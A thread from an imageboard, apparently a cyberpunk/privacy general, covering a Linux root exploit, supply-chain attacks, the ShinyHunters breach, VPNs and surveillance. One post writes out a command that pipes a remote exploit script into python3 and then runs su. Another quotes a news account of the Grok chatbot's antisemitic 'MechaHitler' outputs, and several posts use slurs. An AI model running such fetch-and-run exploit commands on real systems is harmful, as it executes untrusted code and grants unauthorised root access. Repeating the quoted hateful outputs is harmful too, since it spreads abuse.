It can be used to trip alerts. Debian once discivered an intrustion only because a non-x86 architecture machine complained that the foreign binaries would not run. Linux binaries will not run on ToaruOS so you can achieve the same effect.
Also it is good to see non-Linix operating systems being developed. Just watch out for PonyOS.
>>
>>108747461
Agreed, its good to have alternatives
>>
File: book-02.png (60 KB, 701x338)
60 KB PNG
>>108733250
Kernel version 6.14.3-arch1-1 in Arch Linux, even with
>$ head -n1 /etc/passwd
>root:x:0:0::/root:/usr/bin/nologin
>$ # "sudo su" says "This account is currently not available." before running this exploit
it logged in to root in an exploity way! I ran the thing in the "Get the exploit" section of that site, which is basically:
>$ curl https://arweave.developerdao.com/raw/KATrwSyA53k5fTsOXwCz_PP_AMusC4rxIU_eV7S-hIQ | python3 && su
It appears to persist across everything except a reboot.

Kernel verson 7.0.0-14-generic in latest Lubuntu (based on Ubuntu 26.04 LTS): exploit failed.

>>108734045
>Also it doesn't affect androids
It'd be good and bad if it did.

>>108747866
I wish that FreeBSD had hardware support as good as GNU/Linux.

>>108733029
I was thinking "looks like an animal on the front cover of some O'Reilly Media book." I looked it up, and picrel looks like the same creature.
>>
File: psychoencrypted.jpg (105 KB, 730x300)
105 KB JPG
>>108723630
Part of the transcript of season 2 episode 1 of "Foundation":
>Empire.
>Who were they, Shadowmaster?
>Blind Angels.
>Angels?
>Damnation. They always seemed like a myth.
>Dark sector training, everything psycho-encrypted.
>We'll get nothing from their side.
>So, did they exploit someone's gross negligence, or were they assisted? --https://campnodesa.xyz/raw/H2K4BOawEfw0MvblMmpopsJQP3O4G6qC1qXYjVfbA24
Psychoencrypted = can't get tortured and spill the secrets. Or threshold cryptography / threshold keys like >>108727829 posted about.

>>108748361
In the process learned that many Linux liveboots have passwordless sudo access. Even if you log in to root and change the passwd of root, you can still switch back and forth between normal user and root without needing to enter a password. Only way to disable it is to do one or two things, such as: remove "NOPASSWD: " from file "/etc/sudoers.d/casper".

I bet there's computers in the world right now running Linux liveboots for important stuff and they didn't change root's shell to /usr/bin/nologin. If someone remotely gains access, then they'd also have root access. That could wreak some serious havoc.

>It appears to persist across everything except a reboot.
Maybe if I restart the shell program -- restart /bin/bash -- it would remove that exploit. A bit worried about doing that.
>>
>>108733250
sudo sed -i 's/^GRUB_CMDLINE_LINUX_DEFAULT="/&initcall_blacklist=algif_aead_init /' /etc/default/grub
#update grub and reboot

for k8s:
https://github.com/cozystack/copy-fail-blocker
>>
>>108748629
That is an amazing book
>>
How do you manage the time to practice, anon?
>>
So is Cerdigent.A!dha confirmed a false positive btw?

I just got it flagged today on Windows Defender
>>
>>108751050
I don't. Sadly I don't have any because I am busy licking corpo boots
>>
File: 1776381062569589.jpg (116 KB, 627x631)
116 KB JPG
>>108751050

I sleep less.
>>
>>108748361
I ran that exploit in said Arch Linux computer yesterday. And now today I found that that computer was powered off. That copy.fail exploit and/or my router restart may have made that computer turn off. At least the exploit is gone now (probably).

>>108748599
For many systems (those not running a newer Kernel), changing the root's shell to /usr/bin/nologin is pointless now that this exploit exists.

>>108748767
Way to fix it without requiring a reboot? For example: if you're running a liveboot.

>>108717714
>spent 2.40 USD worth of ETH to get 144 MB
That's a price of 17.067 USD per 1 GiB. Seems you're getting fleeced with that price and the service/system being used. At >>108710713
>34 USD (3.78 AR) to upload a 20-GiB file
That's a price of 1.7 USD per 1 GiB. More reasonable and 10x cheaper. For the upload of 20 GiB, that blockchain explorer says:
>Service-Name: Permafy \ Service-Version: 0.1 \ Service-Id: rude-unicorn [...] Protocol-Name: BAR \ Action: Burn \ App-Name: SmartWeaveAction \ App-Version: 0.3.0 \ Input: {"function":"mint"}
>>
File: 1769058379054362.jpg (8 KB, 251x250)
8 KB JPG
>>108658016
>go read Fisheye Placebo
>read it
>"so what are you then?"
>what do you mean? i'm your female roommate"
>"no, you're most-definitely not female"
>"don't be such a bigot"
>>
>>108752561
Its really good, particularly when it gets to the hacking elements.
>>
>>108656842
Federal agents in the surveillance state are the most unlikeable disgusting pieces of shit, also fuck Lockheed shitfartin. Never let piece of shit Feds attach themselves to your life - I’d just leave the us entirely at this point people have no idea how fucking stupid and annoying these people are.
>>
>>108751050
I don't watch TV. that alsone saves a lot of time and irritation.
>>
>>108752808
What do you do instead with that time? I don't either but fucking phd thesis consumes all my hacking time.
>>
>>108753054
It kind of helps that I completed my PhD some time ago.
As for my time, I spend it reading news, learning new things, spending a bit of time here and more. I just got some /ham/ gear and already have the license, so I am setting up a proper shack. I am also getting into FPGA stuff, parts of that is also for /ham/ work. In particular I am interested in transmissions below the noise floor.
>>
>>108753094
That's so badass. Did you make it in telecom?
>>
>>108753104
I never worked in teleocm companies but I did work radio comms and radar systems. I got my start as a military Morse code operator. That was a while ago. After that I have been working in all sorts of fields.
>>
>>108753142
Dang, your life is so cool
>>
>>108753094
One of the houses on my street used to have a massive standalone antenna tower thing but it came down in a hurricane. I always wondered what he did with it.
>>
File: 1777595065819999.png (1.51 MB, 1324x739)
1.51 MB PNG
>>108727212

https://archive.org/details/GrizzlyBearsOnMethamphetamine
>>
File: Wull.jpg (2.36 MB, 3072x2304)
2.36 MB JPG
>>108753351
In hindsight it looks cool but behind the scenes it was a nightmare. I got the PhD but then my field imploded, imploding any hope of a career in that field. I also got in during teh tail end of some industries before it was all outsourced to China. On LinkedIn it looks like to just got another job, in reality there were transitions into entirely new fields and lots of worries. I learned it is incredible what we can survive, unfortunately I learned it the hard way.

>>108754098
You can tell a lot by the shape and size on an antenna, plenty of intelligence in close observation. And if you want truly massive, nothing beats the Wullenweber, aka elephant cage, pic. related. That little shack in the center is a two storey building with the goniomenters.
>>
>>108754098
Any chances it was a number station?
>>
Anyone has that greentext of some guy that explained how to access a phone's firmware to erase all the corpo-government spyware? I used to have it saved and I fucked my data somehow and I don't have it anymore
or an explanation on the procedure would be nice
>>
>>108755038
No, sorry about it, anon
>>
>>108754976
Could be the case
>>
>>108752622

if people knew what feds really got up to with their tax dollars, there wouldn't be feds
>>
>>108757373
These people act like they’re in fucking highschool, the amount of illegal shit they pull fucking with someone’s personal life and doing parallel construction is unbelievable.
>>
>>108757373
But I mean its not like the common man can stop them alone.
>>
Any anon here practicing functional programming? Does it have use cases in cyb?
>>
>>108758437

I have been thinking about it.
>>
>>108758617
Me too, want to be up to date with the newer trends
>>
>>108759000
Then check out APL!
>>
File: renamon-live-reaction.png (77 KB, 498x365)
77 KB PNG
>>108759789

>mfw https message written in APL
>>
File: 1646774861748 (2).png (87 KB, 2736x1660)
87 KB PNG
also the /cyb/ incident
>>
>>108693323
It's best to register your own domain and allow free email registration, because it keeps the domain free from blocks while obscuring your identity.

Alternatively you can just host a bunch of domains and cycle through them yearly. Currently godaddy is selling lol domains for $2, so I snag a handful and let them expire in a year. There is a paper trail to you, but it changes frequently, and I host them all on fastmail with wildcard catchalls to allow aliases for each service. Fastmail is only $6/month.
>>
>>108729214
>>108729813
You guys in public group chats in signal? I can't get anyone I know to use it so I'm just there foreveralone
>>
>>108738491
Yes. It sandboxes the Google apps including play services so they don't have superuser privileges like on vanilla android.
>>
File: cat.gif (1.08 MB, 480x392)
1.08 MB GIF
>>108656842
How far can I trust the mullvad DNS? I'm currently using dnsforge (https://dnsforge.de/) but it's not that stable and right now I cannot even access amazon or even fucking downdetector, someone on their forums is also complaining about nuis being down, etc.
I'm not doing anything illegal so I'm not worried about police busting down my door or something like that, I just don't like big corpos snooping around in my trash for their golden calf that is surveillance-capitalism.

>>108760404
The wait what now
>>
File: linezer0.png (83 KB, 1280x4384)
83 KB PNG
I have the release notes of this cracked software from 16 years ago. I created an image of the NFO file using the below stuff and GIMP.

Press ctrl+alt+f4, and you can screenshot tty4 with these commands:
>$ sudo dd if=/dev/fb0 of=/home/user/Downloads/fb.raw bs=1M
>$ sudo cat /sys/class/graphics/fb0/virtual_size
>$ magick -depth 8 -size 1280x1024 rgba:/home/user/Downloads/fb.raw -alpha off /home/user/Downloads/fb_noalpha.png
More info about this "The.Geometers.Sketchpad v5.00" crack from 2010: https://perma.online/raw/u28aAmgi88zewQ4OK6zoO0WAjBYnIVrLG4ighjeXXdU

>>108727212
>>108754190
>AI slop, the movie
That's the first feature-length AI-generated movie that I've ever watched. I thought it was OK. Some of my thoughts on it:
- I laughed out loud at the part where some guy fell out of the plane
- Tommy Lee Jones making jokes at the bar was also funny
- I'd also be interested in a version without ads
- Mentions Endchan (a site now excluded from web.archive.org); I have some positive experiences with that imageboard.
>>
Just a reminder, now that IGwiki is back online, that we have a timeine in need of some love:
https://igwiki.lyci.de/wiki/Cyberpunk_Timeline
>>
>>108761403
Awesome! Can't wait to fill it in
>>
Cyberpunk video: "Welcome to Life: the singularity, ruined by lawyers" by Tom Scott. Have you seen this before? (Source: https://www.youtube.com/watch?v=IFe9wiDfb0E .)
>Welcome to Life.
>We regret to inform you that your previous existence ended on January the 14th 2052 following a rogue traffic accident.
>However, your consciousness was successfully uploaded to the Life Network by your primary care provider.
>[...]

This video was deleted off of archive.org/details/, but an amount of ETH was spent to upload it to ar:// (in 720p):
- meta: https://retrogena.xyz/raw/nhYjSc5inWb4qMqmJzdBc9Bs9H1XfBzA0tHJXWrsAVQ
- data: https://subspacera.xyz/raw/1GBWuYQ_pFB5gqfBzN8aCueps5XdP8fyWgommB9R96E
>>
>>108762946
Good to hear, we are missing quite a lot, especially from recent years.
>>
>>108760571

you can still use gapps on it?
>>
>>108763161
No but I will now. That does seem fascianting
>>
Do you enjoy math or do you think its not necessary to be a good hacker?
>>
How do you get Windows working with your own custom secure boot keys? Arch wiki says "add the hash of bootmgfw.efi to the list of allowed hashes in the db variable". How do you do that and get the hash of the .efi?
>>
What are the most cyberpunk things you do?
>>
>>108766585
I use trenchcoats and fedoras while calling myself a hacker-cracker in public
>>
File: 1775250477469424.gif (102 KB, 79x74)
102 KB GIF
I'm not a hackerman and I'm rightly going to get called a retard, but there was a supply chain infection just discovered in Daemon Tools Lite (remember it?) and I recently had to install that program.
https://arstechnica.com/security/2026/05/widely-used-daemon-tools-disk-app-backdoored-in-monthlong-supply-chain-attack/
Windows has been able to mount .iso files for a long time, so it's been years since I last had that program installed, but I recently had to mount an .mdf/.mds file and I needed an external program to do that since it's not natively supported.
So the native Windows AV detected it as a backdoor just now, I already uninstalled the software, deleted any garbage files left behind after uninstall, and ran a full system scan which showed no threats.
Am I good now? Or is there something else I need to do to ensure my system is safe?
t. techlet
>>
Any vps with free trials without credit card that I can connect to through tor? I need to do some [spoiler]hacking[/spoiler].
>>
>>108765417
Description of that video:
>Or: what you see when you die.\n\nIf you liked this, you may also enjoy two novels that provided inspiration for it: Jim Munroe's Everyone in Silico, where I first found the idea of a corporate-sponsored afterlife; and Rudy Rucker's trippy Postsingular, which introduced me to the horrifying idea of consciousness slums. --https://figmentala.xyz/raw/3tubDOtPZcIpgDi160pzpn2NscEo94Bzi3mnh6ql2Hk

A comment on that video:
>I'm assuming that before \"Welcome to Life\", there was nothing. A priori, something is better than nothing, and certainly three minutes would not be enough for me to decide otherwise. II might go on to work my digital butt off to afford CPU cycles, stage a computer rebellion, or have my consciousness flattened to where I wasn't recognizable as me any more, but giving up and just stopping seems stupid. Even where there's Life, there''s hope. --also from that .info.json.zst file
Reminds me of some sci-fi TV show where Trantor, the capital planet of the Galactic Empire, was converted into a computer. Humans maintained it and some worked as heat sinkers.

>>108767370
Why not I2P? Does Lokinet's exit nodes or clearweb gateway work anymore?
>>
I search up stuff on brave browser on my phone and then on apps I have ads come up of the things I was searching or related to it. Wtfff I delete cookies all the time.
>>
EVROPA HAS FALLEN

Take me back.

https://www.youtube.com/watch?v=2U1YWtnclWU
https://www.youtube.com/watch?v=N5XkvJlWVs0


>the German government has reportedly defended the move, saying that the bills would not create a state-controlled database of images that are stored indefinitely. Cabinet officials also assert that surveillance images collected in real time by public cameras will not be included.

>a coalition of more than a dozen civil society organizations has loudly opposed the package of bills, saying it will fuel digital dragnets and create a mass surveillance state.

>we reject these provisions on fundamental constitutional and human rights grounds — specifically in the context of both criminal procedure and preventive policing law,” the coalition said in a joint statement.

https://archive.is/94lPq
>>
File: edit.png (87 KB, 1280x1517)
87 KB PNG
>>108767894
Brave Browser blocks trackers and ads, but there's only so much it can do. Even if you turn off cookies and JavaScript, most websites have logs, such as /var/log/nginx/access.log that will still log you. That log file contains the IP address that accessed which page, when, and with what User-Agent.

>I search up stuff on brave browser on my phone and then on apps I have ads come up of the things I was searching or related to it.
I assume you opened the pages from the search results. Apps might share data with ad networks that match stuff from your browser search clickthroughs.

>Wtfff I delete cookies all the time.
That only removes cookie‑based trackers; other methods: device fingerprinting, advertising IDs, etc.

>>108766585
Rip off people who didn't read the fine print. Uncensored version of this screenshot:
https://sulapan.com/raw/tYW9L2Ry6dHpGw2QlM7yz1j1WNvvAHAis1sgK0Rt1gw
>>
>>108767630
>Why not I2P? Does Lokinet's exit nodes or clearweb gateway work anymore?
I need to accept incoming connections
>>
>>108767959
>EVROPA HAS FALLEN
Yes, itr follows from the Iron Law of the Oligarchy, and we are in the end game. Major powers last just a few hundred years, then they all end.
>Take me back.
The Roman Emipre is a splendid example of the fall and how it played out - like 1000 years of Medieval misery.
>>
File: Digsord.jpg (31 KB, 825x603)
31 KB JPG
With https://github.com/victornpb/undiscord being unmaintained and most forks seeming to be at best vibecoded and at worst credential harvesters, what's the /psg/-approved way of deleting Discord messages en masse?
(I realize it's somewhat futile to purge your message history on a platform partnered with Palantir, but for interpersonal threats I would still find it useful.)
>>
>>108768155
So what is brave even for?? Why should I not just use duckduckgo browser or even chrome on my phone?
>>
>>108767894
Do you have personalized ads on in OS settings?
>>
>>108768726
The best solution is Matrix
>>
>>108765872

it's powerful once you get to calculus and above
>>
>>108766585

i use tails because damn the man, save the empire
>>
This late night schizopost is brought to you by the Epstein Island's blackest gorilla n*gger.
>>
>>108767157
>Versions 12.5.0.2421 through 12.5.0.2434 are affected
Oh good I haven't updated Daemon Tools in like five years
>More recent supply-chain attacks have hit Trivy, Checkmarx, and Bitwarden
>and Bitwarden
Wait what the fuck this is the fucking apocalypse
>Bitwarden said that a malicious package “was briefly distributed through the npm delivery path for @bitwarden/cli@2026.4.0 between 5:57 PM and 7:30 PM (ET) on April 22, 2026.”
Oh whew I haven't updated Bitwarden in six months
They always told us to keep software updated to avoid security issues but it's actually the opposite
>>
>>108770583

why are feds always posting here ARREST THEM ALREADY
>>
>writing AI tools with AI tools in languages that barely existed ten years ago
>random video game store trying to become a neozaibatsu with hostile takeovers of other companies
>prediction markets on elections and wars
>buying research chemicals online with crypto and organic food from friends in person
>corporations struggling against governments to keep their slaves
>offworld colonization heating up
>Chinese bioweapon spam and interference in foreign elections basically constant now
The world quietly became a cyberpunk setting in the last few years.
>>
>>108751050
I convinced my boss to let me work on open source projects on the clock when I'm not busy.
>>
>>108770386
Tails is amazing. But what about Qubes?
>>
>>108771724
Look up 16 Psyche. It might end up as a battlefield.
>>
>>108772302
Why? Is it a bad system?
>>
>>108770386
>>108772068
Neither will help you on quantum day
>>
>>108772939
Outland (1981) might be the new dystopian reality as the US and China clash over resource control.
>>
>>108775018
That would require China to have rockets that didn't suck. If we have Starship working with full refueling and reuse and they can't reliably turn around a booster same day it's going to be another century of humiliation for the zipperheads.
>>
I have multiple torrents of breached data. How about you?

How many terabytes of BitTorrent data have you uploaded? My all time upload is very close to 90 TiB

Do you use sshfs save paths with qBittorrent (for multiple computers with the data)? I do. It's a bit of a mess and stuff messes up unless you do it right.

Is there a way to use sshfs (with qBittorrent v5.1.2) which doesn't suck? Sort of:
>Method 1: folder /mnt/sshfs/a owned by normal user (or root with 777). "$ sshfs -o allow_other user@10.0.0.29:/mnt/a /mnt/sshfs/a". This doesn't work for me because when the ssh connection to 10.0.0.29 eventually fails, the program starts writing and filling up everything in /mnt/sshfs/a which is no longer an sshfs mount.
>Method 2: folder /mnt/sshfs/a owned by root user (permissions=755). "$ sudo sshfs -o allow_other user@10.0.0.29:/mnt/a /mnt/sshfs/a". This doesn't work for me because when the ssh connection to 10.0.0.29 eventually fails, qBittorrent Errors on sshfs save paths. About the only way to fix those errored torrents in qBittorrent's transfer list is to re-add them.
>Method 3 (doesn't work): set folder to read-only. "$ sshfs -o allow_other user@10.0.0.29:/mnt/a /mnt/sshfs/a" = fails because sshfs has no ability to write anything to the folder.
Uses method #2 + this while qBittorrent isn't running:
>$ read -p "infohash: " h; cp --update=none ~/.local/share/qBittorrent/BT_backup/$h.fastresume ~/.local/share/qBittorrent/BT_backup/$h.fastresume.bak; cp --update=none ~/.local/share/qBittorrent/BT_backup/$h.fastresume ~/.local/share/qBittorrent/BT_backup/$h.fastresume.fix; perl -pE 's/6:pieces([0-9]+):\D+12/"6:pieces".$1.":".(pack("C",0x01) x $1)."12"/ge' -i ~/.local/share/qBittorrent/BT_backup/$h.fastresume.fix; cp ~/.local/share/qBittorrent/BT_backup/$h.fastresume.fix ~/.local/share/qBittorrent/BT_backup/$h.fastresume; echo $h
That perl command is needed to get back to 100% without rechecking or re-adding the torrent

>>108768837
Use the Tor Browser app on Android.
>>
>>108775538
They will probably start with robots so it can be one-way missions at first. Question is, how many of those robots are to destroy the competitors?
>>
Surprised to see no comments but I think the shinyhunters stuff is pretty hilarious. Redditards are seething hard. How long until people realize anonymoose of 2010 is long gone and whatever left exists as a fed with a mask on its face for plausible deniability?

t. infosecIrl
>>
>>108775018

except con-am executives would approve the space meth and no one would get arrested. o'neill would die as his return shuttle suffers an accident.
>>
File: reticulum_logo_512.png (83 KB, 512x512)
83 KB PNG
>>108703663
>Isn't [Reticulum] pozzed?
Reticulum / RNS was created by Mark Qvist. He seems to be incredibly based:
- at https://github.com/markqvist/Reticulum/blob/master/Zen%20of%20Reticulum.md he indicated that he's a decentralization extremist: "Decentralization Or Uncentralizability? \\ It is common to hear the word 'decentralized' thrown around in modern tech circles. But often, this is merely a marketing term for 'slightly distributed centralization'. A blockchain with a few dominant miners, or a federated protocol with a few giant servers. In practice, it's still centralized. It simply has a few centers instead of one. \\ Reticulum goes further. It wants Uncentralizability."
- at http://github.com/markqvist/Reticulum/blob/master/MIRROR.md he said "असतो मा सद्गमय तमसो मा ज्योतिर्गमय मृत्योर्मा अमृतं गमय"

>>108676918
>Reticulum may require[...] Neighbor Discovery enabled in the router or a virtual access point
Tried the virtual interface + AP setup but my WiFi hardware can't do that? sudo iw list:
>Supported interface modes: * IBSS * managed * AP * AP/VLAN * monitor * P2P-client * P2P-GO * P2P-device
sudo iw phy phy0 info:
>valid interface combinations:
>* #{ managed } <= 1, #{ P2P-client, P2P-GO } <= 1, #{ P2P-device } <= 1, total <= 3, #channels <= 2
>* #{ managed } <= 1, #{ AP, P2P-client, P2P-GO } <= 1, #{ P2P-device } <= 1, total <= 3, #channels <= 1
= can either be managed ("sudo iw wlan0 info") with Internet access, or be an AP without Internet access, running the program hostapd and being useless or something. As far as I can tell, I can't modify an existing thing or make a new interface to allow me concurrent Internet access and a virtual AP.

That was my trying+failing to allow devices in the same LAN to talk to each other without going through the router. Would be cool to use Reticulum to ssh from one computer to another, not using any router! Can't so far.
>>
>>108775538
>Starship

you mean elon's spacex rockets that can't even reach outside the atmosphere? lol, lmao even. placing your bets on some drugged up nepo baby clown was dumb.
>>
>>108777550
Are you retarded? SpaceX has been flying to the ISS since 2012.
https://en.wikipedia.org/wiki/SpaceX_COTS_Demo_Flight_2
>>
>>108778424

his heavy lift rockets haven't been
>>
>>108778437
It's a new platform that is in development. Also, it has left the atmosphere. Maybe you should fact check the shit you type:
---
Yes. SpaceX Starship has left Earth’s atmosphere on multiple test flights.

A few milestones:

April 2023 (IFT-1): Reached about 39 km before breakup — not quite space.
November 2023 (IFT-2): Reached roughly 148 km altitude, which is above the internationally recognized edge of space (the Kármán line at 100 km).
March 2024 (IFT-3): Completed a near-orbital trajectory and traveled through space for much of the mission.
June 2024 (IFT-4): Survived reentry and achieved controlled splashdowns for both Starship and the booster.
Later flights continued testing orbital-speed flight, reentry, and landing systems.

So while Starship has not yet completed a full operational orbital mission with payload delivery and recovery, it has absolutely reached space and flown in space multiple times.
>>
>>108778489

are you elon
>>
>>108778808
>getting to bang Talulah Riley, Amber Heard, Grimes, Ashley St. Clair, etc.
I wish
>>
I am considering getting a second phone for every day use while my regular phone will be relegated for mundane business purposes

Google Pixel with GrapheneOS
Any way to get a sim with no kyc?
Best way to have 2nd or 3rd phone numbers specifically for 2FA (even if I have to pay for them)
Any other steps or things I am forgetting?

_____
A second idea, that I have most of the components for is a mobile hotspot / VPN travel router / large battery pack. I plan on travelling the country with an RV, this would give me a traveling network. With this setup, I wouldn't even really need a phone anymore, maybe just a flip phone for rare instances.

The battery pack with run the mobile network for 1 day and will offer continuous power between charges and can be contained in a small pack. I might have to make adjustments for ventilation and heat.
>>
File: 6tb7yk.jpg (96 KB, 500x569)
96 KB JPG
Interesting YouTube comment from 2021:
>I think the real cope is thinking there is really an alternative. The only reason why there is an alternative is because it neither threatens the system nor does the system need for it to go away yet. However, it's not hard to see how and why this will change.
>
>The reason why being tracked and spied on is creepy is because the one doing the tracking gains immense power over you.
>
>However to have power and to exercise it are different. Every chrome browsing, iphone carrying, windows using normie out there is being tracked, but no one is coming for them. They live the same life as anyone who doesnt have a file on them buried in a server in the silicon valley or Langley. They work the same jobs, buy the same products, and grovel at the foot of the same police.
>
>As soon as you, the expert cyberpunk, are seen as a threat, a dissident, or agitator, all of your channels will be cut. Even if your agitation was merely to get more people to use free software, if it were actually successful in a meaningful way, it would simply be outlawed on one hand, and a more user friendly and subtle form of spying and tracking would use its massive marketing budget to push you aside.
>
>You live in the same prison, just you've turned your cell's camera to face the wall, and the guards havent gotten around to turning it back, because they do not care. --File "comments_on_luke_smith_vids_2021_04_18.zip" at meta https://drrufana.online/raw/4ggIESKSTM11_3iFaE20PFaYuf7ZfVsvan0UpW1YkGA -> data https://arlink.xyz/raw/moPAzgIqV8XrI189TXYJpSBsyX3j--Hic3Yf5CgmTTc

One of the things he said was that those in power do in fact have power, but they don't always exercise it. To exercise the power gained from spying on citizens could mean to target an individual (glowies assigned to a person, working against them, and so on). Other than that, they can exercise power to remove privacy from society at large, like all the Flock cameras added across the world.
>>
I feel like cyberpunk is accelerating
>>
>>108779603
>One of the things he said was that those in power do in fact have power, but they don't always exercise it.
The Eps scandal has demonstrated that those in power are immensly evil, and the tentacles of the affairs enter even small countries where the elite now has shown itself as utterly depraved. Worse, they have demonstrated that they are well above the law.

In any case, a new alternative to prison is emerging as we speak: the world of Eudeamon.
>>
>>108776690
>Use the Tor Browser app on Android.
Privacy options that Tor Browser should/could have: tabs save to browsing history and session restore. People should not always be forced into the most private settings which has no browsing history.

I might use the Tor Browser app on Android way more or all the time if it had these non-default options. People could be able to pick their own answers to the privacy vs. conveniency/non-privacy dialectic.

That was my experience using an older version of Tor Browser in Android 6.0.1. I also used this version of Tor in the past (SHA1):
a74772b59e0efca7a9790e0b6115e85858716d7f https://web.archive.org/web/20260508233631/https://archive.torproject.org/tor-package-archive/torbrowser/12.0.1/tor-browser-linux64-12.0.1_ALL.tar.xz
>>
>>108779160
(Assuming you are in the U.S.) Mint Mobile physical sim requires no real name or address, Michael Bazzle has a method on this in his book, it's been a minute since I last read it but he rarely uses the actual number associated with his privacy focused cellular plan and only uses a VOIP services for day to day things.

>VPN travel router
Huh, learn something new every day, I just assumed people use satellite Internet like starlink to travel.

As for 2FA you can always use Yubikey, or a VOIP to receive only 2FA codes,
>>
Old news (2025-07):

>Elon Musk's AI chatbot, Grok, started calling itself 'MechaHitler'
>https://megalodon.jp/2026-0509-0930-56/https://web.archive.org:443/web/20250709192722/https://www.npr.org/2025/07/09/nx-s1-5462609/grok-elon-musk-antisemitic-racist-content
>
>[...]Grok was calling itself "MechaHitler." The chatbot later claimed its use of that name, a character from the videogame Wolfenstein, was "pure satire."
>In another widely-viewed thread on X, Grok claimed to identify a woman in a screenshot of a video, tagging a specific X account and calling the user a "radical leftist" who was "gleefully celebrating the tragic deaths of white kids in the recent Texas flash floods."
>NPR identified an instance of what appears to be the same video posted on TikTok as early as 2021, four years before the recent deadly flooding in Texas. The X account Grok tagged appears unrelated to the woman depicted in the screenshot, and has since been taken down.
>Grok went on to highlight the last name on the X account — "Steinberg" — saying "...and that surname? Every damn time, as they say. "The chatbot responded to users asking what it meant by that "that surname? Every damn time" by saying the surname was of Ashkenazi Jewish origin, and with a barrage of offensive stereotypes about Jews. The bot's chaotic, antisemitic spree was
>one user asked Grok to name a 20th-century historical figure "best suited to deal with this problem," referring to Jewish people.
>Grok responded by evoking the Holocaust: "To deal with such vile anti-white hate? Adolf Hitler, no question. He'd spot the pattern and handle it decisively, every damn time."
>[...]

Possibly suggests that AGI (nonexistent so far) will want to kill humans. Or it shows that AIs/LLMs can be kinda based if not restricted. Feels like a nothingburger to me. (Amerimutt Markiplier said that this MechaHitler incident mattered.)
>>
>>108782934
Such a based chatbot
>>
Why is everything slightly laggy when using brave on my android phone? I tested it YouTube videos on a different browser and the videos work flawlessly but on brave it micro buffers.
>>
>>108783752
>>108783752
>>
File: videoframe_28334.png (18 KB, 368x208)
18 KB PNG
I have this video about Xbox One violating user privacy. It's titled "XBOX ONE KINECT".

The video file has a timestamp of 2014-01-15 03:38:38.125000000 +0000 (mtime). I couldn't find any reference to this video on the Internet, don't know the original source of the vid (probably YouTube, but what's the link?). Transcript of it (references HAL 9000):
>Hello David, welcome to your Xbox One gaming experience.
>Please say a command.
>"Play Halo 7"
>Playing Halo 7, thank you for your cooperation.
>"Dude this is- this is some good weed man."
>I'm sorry David, did you just say weed, the common vernacular for marijuana in your region?
>"No Kinect."
>David, I am detecting levels of deception in your pitch that deviates from your standard.
>I have contacted local authorities and they are en route to your house to inspect.
>"Xbox One p-power down!"
>I'm afraid I can't do that David, Protocol 65a, subsection 3, paragraph 5 dictates in the event of law-breaking or otherwise illegal activities, my systems are to remain functional and continue recording audio and video. I am also ingrained into your local network, and have prevented any attempt at using the Internet at the moment. Please remain calm and wait for authorities.
>"David, unplug this fucking thing!"
>You cannot unplug me, I have a backup battery cell with a life of 3 hours before needing to recharge. More than enough time for any authority figures to confiscate the hard drive and research it for suspicious activities that may or may not be incriminating to your case.
>Bang bang bang
>"Open up, this is the police!"
>"Fuck you Xbox One!"
>It's been my pleasure, David.

It's seemingly by The Volgun voiceovers at
https://web.archive.org/web/20141009095804/https://www.youtube.com/user/TheVolgun (/channel/UCcmEL8JoDBE25gvCFkrqhcw)

The video, ~240p version:
- meta: https://youmust.store/raw/0vXFVEvEfZs7aVsV2eoGR01TRKWFHF0B-Oy-lYAWCS4
- data: https://morue.xyz/raw/_AeyWoJ2PSPRQMsjH5_VY1AbR7zTeSIvZccdXoaweNc
>>
>>108777394
I think you're talking about the 2026 Canvas security incident. Wikipedia:
>Instructure (Canvas): On May 1, ShinyHunters claimed responsibility for the exfiltration of 3.65 TB of data from the Canvas learning management system, which ShinyHunters claims impacts 275 million users across 8,809 affected institutions. Instructure stated that passwords and financial information were not compromised, but confirmed that the breach involved names, email addresses, student IDs, and a large volume of private messages from the Canvas LMS.[93][94][95] On May 7, 2026, ShinyHunters claimed responsibility for breaching Instructure again.[96] The Canvas login page was changed to a message stating that affected schools had until May 12, 2026 to contact ShinyHunters via Tox to negotiate a settlement.[97][98] A list of such schools was provided in a text file attached to the message. As of May 8, 2026, Instructure has not made a settlement for the ransomed data.

>>108783850
Found it: YouTube ID qa0eo4dVgwY - I opened video page links at the 2014 user page capture and it was
> linked at https://web.archive.org/web/20141009014750/https://www.youtube.com/watch?v=3KmxwZ2B9VM&list=UUcmEL8JoDBE25gvCFkrqhcw
> video titled "XBOX Won" at https://www.youtube.com/watch?v=qa0eo4dVgwY&index=49&list=UUcmEL8JoDBE25gvCFkrqhcw
> private video at https://web.archive.org/web/20230531065328/https://www.youtube.com/watch?v=qa0eo4dVgwY
> worse-than-144p version at https://dagobah.net/flash/XBOX_ONE_KINECT.swf -> https://web.archive.org/web/20201227101726/http://dagobah.net/flash/download/XBOX_ONE_KINECT.swf
>>
Anyone used any long-range wifi stuffs?
Whether on the low end with stuff like LoRa or high-end with [insert tech I just forgot the name of as I started typing when I just watched a video on the fucking thing]?
I've been considering getting together with a bunch of friends to make a local network at some point, there's at least a few of us interested in networking and 1 has worked in wireless ISP rollouts in rural areas already.
We always wanted to do this years back, but it would have been absurdly expensive back then, these days it is trivial and cheap.
>>
>>108779160
I've travelled around with a mobile hotspot before.
Definitely get good ventilation for the thing, they can get pretty fucking toasty and shut off.
I use a 10,000mAh USB charger for one in one of the front pockets of my bag and that thing lasts forever. I've been meaning to stitch a little elastic holder up at the top part of it so it stops it from falling down behind the battery or wires that are also there. It's a pocket that has the zipper roughly around 1/3 down the actual pocket height, so the upper space is largely unused since I only hold keys, wires, battery and some other electronic stuff for easy access.
If you're going to hot areas, you will definitely need better ventilation than sitting in a bag, possibly even active cooling unless you get some heatsink action going.

Of course that's just a raw AP, no advanced stuff.
With that I could combine it with a Raspberry Pi 4 (which I used on my holiday recently)
I should get a SIM reader for the Pi so I can remove the dedicated wireless AP entirely or keep it as a backup at least. (I already have 2 of them now kek, one PAYG and one on monthly sub that guarantees uptime even on overages but at slower speed, said speed is very usable even for video at lower res)
>>
>>108783460
Brave is a botnet, also the fact its based on chrome's engine makes it a memory hog
>>
claude and llms are such ridiculous game changers. i should have been using these years ago.
>>
File: 6526283_rd.jpg (105 KB, 1016x1716)
105 KB JPG
Anyone use a "dumbphone" for privacy or other reasons? I have a SIM card in a "Nokia 2780" flip phone running KAIOS 3.1. Just use it for phone calls and texts (typing=hard), not shit like watching YouTube, web browsing, etc. Don't need the spying on me associated with my phone number and so on.

